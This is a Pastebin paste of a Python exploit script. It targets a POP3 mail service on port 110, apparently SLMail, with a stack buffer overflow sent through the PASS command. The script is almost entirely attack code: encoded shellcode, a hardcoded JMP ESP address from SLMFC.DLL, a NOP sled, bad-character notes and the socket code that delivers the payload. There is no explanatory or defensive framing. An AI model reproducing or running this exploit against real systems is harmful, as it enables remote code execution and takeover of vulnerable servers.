Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import socket
- s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- # \xff\xe4
- # Message= 0x5f4a358f : "\xff\xe4" | {PAGE_READONLY} [SLMFC.DLL] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v6.00.8063.0 (C:\Windows\system32\SLMFC.DLL)
- # \x00 \x0a \x0d
- buf = b""
- buf += b"\xdb\xd0\xbd\x7a\xaf\xcf\xbc\xd9\x74\x24\xf4\x58\x31"
- buf += b"\xc9\xb1\x56\x31\x68\x18\x03\x68\x18\x83\xe8\x86\x4d"
- buf += b"\x3a\x40\x9e\x10\xc5\xb9\x5e\x75\x4f\x5c\x6f\xb5\x2b"
- buf += b"\x14\xdf\x05\x3f\x78\xd3\xee\x6d\x69\x60\x82\xb9\x9e"
- buf += b"\xc1\x29\x9c\x91\xd2\x02\xdc\xb0\x50\x59\x31\x13\x69"
- buf += b"\x92\x44\x52\xae\xcf\xa5\x06\x67\x9b\x18\xb7\x0c\xd1"
- buf += b"\xa0\x3c\x5e\xf7\xa0\xa1\x16\xf6\x81\x77\x2d\xa1\x01"
- buf += b"\x79\xe2\xd9\x0b\x61\xe7\xe4\xc2\x1a\xd3\x93\xd4\xca"
- buf += b"\x2a\x5b\x7a\x33\x83\xae\x82\x73\x23\x51\xf1\x8d\x50"
- buf += b"\xec\x02\x4a\x2b\x2a\x86\x49\x8b\xb9\x30\xb6\x2a\x6d"
- buf += b"\xa6\x3d\x20\xda\xac\x1a\x24\xdd\x61\x11\x50\x56\x84"
- buf += b"\xf6\xd1\x2c\xa3\xd2\xba\xf7\xca\x43\x66\x59\xf2\x94"
- buf += b"\xc9\x06\x56\xde\xe7\x53\xeb\xbd\x6f\x97\xc6\x3d\x6f"
- buf += b"\xbf\x51\x4d\x5d\x60\xca\xd9\xed\xe9\xd4\x1e\x64\xfd"
- buf += b"\xe6\xf1\xce\x6e\x19\xf2\x2e\xa6\xde\xa6\x7e\xd0\xf7"
- buf += b"\xc6\x15\x20\xf7\x12\x83\x2a\x6f\x5d\xfb\xab\xe5\x35"
- buf += b"\xf9\xab\xe9\x24\x74\x4d\x59\xf7\xd6\xc2\x1a\xa7\x96"
- buf += b"\xb2\xf2\xad\x19\xec\xe3\xcd\xf0\x85\x8e\x21\xac\xfe"
- buf += b"\x26\xdb\xf5\x75\xd6\x24\x20\xf0\xd8\xaf\xc0\x04\x96"
- buf += b"\x47\xa1\x16\xcf\x3f\x49\xe7\x10\xaa\x49\x8d\x14\x7c"
- buf += b"\x1e\x39\x17\x59\x68\xe6\xe8\x8c\xeb\xe1\x17\x51\xdd"
- buf += b"\x9a\x2e\xc7\x61\xf5\x4e\x07\x61\x05\x19\x4d\x61\x6d"
- buf += b"\xfd\x35\x32\x88\x02\xe0\x27\x01\x97\x0b\x11\xf5\x30"
- buf += b"\x64\x9f\x20\x76\x2b\x60\x07\x04\x2c\x9e\xd5\x23\x95"
- buf += b"\xf6\x25\x74\x25\x06\x4c\x74\x75\x6e\x9b\x5b\x7a\x5e"
- buf += b"\x64\x76\xd3\xf6\xef\x17\x91\x67\xef\x3d\x77\x39\xf0"
- buf += b"\xb2\xac\xca\x8b\xbb\x53\x2b\x6c\xd2\x37\x2c\x6c\xda"
- buf += b"\x49\x11\xba\xe3\x3f\x54\x7e\x50\x4f\xe3\x23\xf1\xda"
- buf += b"\x0b\x77\x01\xcf"
- shellcode = buf
- nop = "\x90" * 16 # NOP
- eip = "\x8f\x35\x4a\x5f" # 5f 4a 35 8f
- buffer = '\x41' * 4654 + eip + nop + shellcode
- s.connect(('127.0.0.1', 110))
- data = s.recv(1024)
- print data
- s.send('USER username' +'\r\n')
- data = s.recv(1024)
- print data
- s.send('PASS ' + buffer + '\r\n')
- data = s.recv(1024)
- print data
- s.close()
Add Comment
Please, Sign In to add comment